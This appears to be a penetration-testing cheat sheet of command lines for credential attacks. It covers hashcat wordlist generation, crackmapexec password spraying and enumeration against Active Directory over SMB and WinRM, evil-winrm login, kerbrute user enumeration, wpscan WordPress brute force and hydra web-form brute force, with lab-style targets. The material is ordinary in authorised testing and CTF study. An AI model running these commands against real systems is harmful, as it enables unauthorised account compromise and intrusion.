Hacker Mind

Brute Force

Generate Wordlist

Password possibilities:

  • username

  • summer, spring, winter

  • password

  • date (July, April, 2023, etc.)

Using Hashcat

hashcat --force --stdout -r /usr/share/hashcat/rules/best64.rule password.lst

Active Directory

Check workstations

crackmapexec smb 192.168.1.0/24
crackmapexec winrm 192.168.1.0/24


# have a user and password?
# go enumerate computers in the domain
crackmapexec smb $IP -u <username> -p <password> --computers

Password spraying

Check the password policy:

crackmapexec smb $IP --pass-pol

# Check the output: if it contains a line like the one below, go ahead with the brute force.
Account Lockout Threshold: None

Prepare targets.txt, users.txt and passwords.txt:

crackmapexec winrm targets.txt -u users.txt -p passwords.txt --continue-on-success -d <domain>

crackmapexec smb $IP -u users.txt -p '<password>'
crackmapexec winrm $IP -u users.txt -p '<password>'
# --> use evil-winrm to log in
# example: evil-winrm -u mhope -p 'testpassword' -i $IP

Kerbrute

kerbrute userenum --dc <dc ip> -d <domain> users.txt
kerbrute userenum --dc <dc ip> -d <domain> /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt


# kerbrute with NTLM hash (https://github.com/3gstudent/pyKerbrute)

Wordpress Login

wpscan --url <wordpress url> --wordlist /usr/share/wordlists/rockyou.txt --username <username>

Website Login Brute Force

hydra -l '' -P 3digits.txt -f -v 10.10.171.8 http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000

Last updated 1 year ago